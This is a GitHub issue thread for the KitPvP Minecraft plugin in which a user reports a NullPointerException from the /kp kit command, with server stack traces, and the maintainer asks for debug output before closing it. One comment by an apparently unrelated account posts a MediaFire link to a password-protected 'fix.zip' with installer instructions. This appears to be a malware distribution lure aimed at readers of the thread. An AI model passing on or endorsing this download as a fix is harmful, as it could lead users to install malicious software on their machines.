### ISSUE TITLE
Command error /kp kit

### ISSUE THREAD

**Issue by akva449** [cervinakuy/KitPvP#264]
**Description of the bug**
Error with the /kp kit command

**Errors**
```
26.08 15:55:44 [Server] ERROR null
26.08 15:55:44 [Server] INFO org.bukkit.command.CommandException: Unhandled exception executing command 'kp' in plugin KitPvP v2.2.3
26.08 15:55:44 [Server] INFO at org.bukkit.command.PluginCommand.execute(PluginCommand.java:47) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.command.SimpleCommandMap.dispatch(SimpleCommandMap.java:172) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.craftbukkit.v1_16_R3.CraftServer.dispatchCommand(CraftServer.java:826) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.Bukkit.dispatchCommand(Bukkit.java:776) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.command.FormattedCommandAlias.execute(FormattedCommandAlias.java:37) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.command.SimpleCommandMap.dispatch(SimpleCommandMap.java:172) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.craftbukkit.v1_16_R3.CraftServer.dispatchCommand(CraftServer.java:826) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at net.minecraft.server.v1_16_R3.PlayerConnection.handleCommand(PlayerConnection.java:2315) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at net.minecraft.server.v1_16_R3.PlayerConnection.chat(PlayerConnection.java:2226) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.craftbukkit.v1_16_R3.entity.CraftPlayer.chat(CraftPlayer.java:539) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at com.extendedclip.deluxemenus.action.ClickActionTask.run(ClickActionTask.java:79) ~[?:?]
26.08 15:55:44 [Server] INFO at org.bukkit.craftbukkit.v1_16_R3.scheduler.CraftTask.run(CraftTask.java:100) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at org.bukkit.craftbukkit.v1_16_R3.scheduler.CraftScheduler.mainThreadHeartbeat(CraftScheduler.java:468) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at net.minecraft.server.v1_16_R3.MinecraftServer.b(MinecraftServer.java:1503) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at net.minecraft.server.v1_16_R3.DedicatedServer.b(DedicatedServer.java:449) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at net.minecraft.server.v1_16_R3.MinecraftServer.a(MinecraftServer.java:1416) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at net.minecraft.server.v1_16_R3.MinecraftServer.w(MinecraftServer.java:1142) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at net.minecraft.server.v1_16_R3.MinecraftServer.lambda$a$0(MinecraftServer.java:293) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO at java.lang.Thread.run(Thread.java:1583) [?:?]
26.08 15:55:44 [Server] INFO Caused by: java.lang.NullPointerException: Cannot invoke "Object.toString()" because the return value of "com.planetgallium.database.Field.getValue()" is null
26.08 15:55:44 [Server] INFO at com.planetgallium.database.Table.setStatementParameterToType(Table.java:287) ~[?:?]
26.08 15:55:44 [Server] INFO at com.planetgallium.database.Table.getRecord(Table.java:179) ~[?:?]
26.08 15:55:44 [Server] INFO at com.planetgallium.kitpvp.game.Infobase.getData(Infobase.java:251) ~[?:?]
26.08 15:55:44 [Server] INFO at com.planetgallium.kitpvp.game.Cooldowns.getRemainingCooldown(Cooldowns.java:46) ~[?:?]
26.08 15:55:44 [Server] INFO at com.planetgallium.kitpvp.game.Kits.attemptToGiveKitToPlayer(Kits.java:220) ~[?:?]
26.08 15:55:44 [Server] INFO at com.planetgallium.kitpvp.command.MainCommand.executeKitCommandSelf(MainCommand.java:484) ~[?:?]
26.08 15:55:44 [Server] INFO at com.planetgallium.kitpvp.command.MainCommand.onCommand(MainCommand.java:150) ~[?:?]
26.08 15:55:44 [Server] INFO at org.bukkit.command.PluginCommand.execute(PluginCommand.java:45) ~[patched_1.16.5.jar:git-Purpur-1171]
26.08 15:55:44 [Server] INFO ... 18 more
```
```
 Unhandled exception executing command 'kp' in plugin KitPvP v2.2.3
 at org.bukkit.command.PluginCommand.execute(PluginCommand.java:47)
 at org.bukkit.command.SimpleCommandMap.dispatch(SimpleCommandMap.java:172)
 at org.bukkit.craftbukkit.v1_16_R3.CraftServer.dispatchCommand(CraftServer.java:826)
 at org.bukkit.Bukkit.dispatchCommand(Bukkit.java:776)
 at com.extendedclip.deluxemenus.action.ClickActionTask.run(ClickActionTask.java:95)
 at org.bukkit.craftbukkit.v1_16_R3.scheduler.CraftTask.run(CraftTask.java:100)
 at org.bukkit.craftbukkit.v1_16_R3.scheduler.CraftScheduler.mainThreadHeartbeat(CraftScheduler.java:468)
 at net.minecraft.server.v1_16_R3.MinecraftServer.b(MinecraftServer.java:1503)
 at net.minecraft.server.v1_16_R3.DedicatedServer.b(DedicatedServer.java:449)
 at net.minecraft.server.v1_16_R3.MinecraftServer.a(MinecraftServer.java:1416)
 at net.minecraft.server.v1_16_R3.MinecraftServer.w(MinecraftServer.java:1142)
 at net.minecraft.server.v1_16_R3.MinecraftServer.lambda$a$0(MinecraftServer.java:293)
 at java.base/java.lang.Thread.run(Thread.java:1583)
Caused by: java.lang.NullPointerException
```

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cervinakuy** [comment]
Please include a screenshot of /kp debug so I can further diagnose the problem.

**Comment by cervinakuy** [comment]
Closing due to no follow-up. Please feel free to re-open if you include /kp debug screenshot.
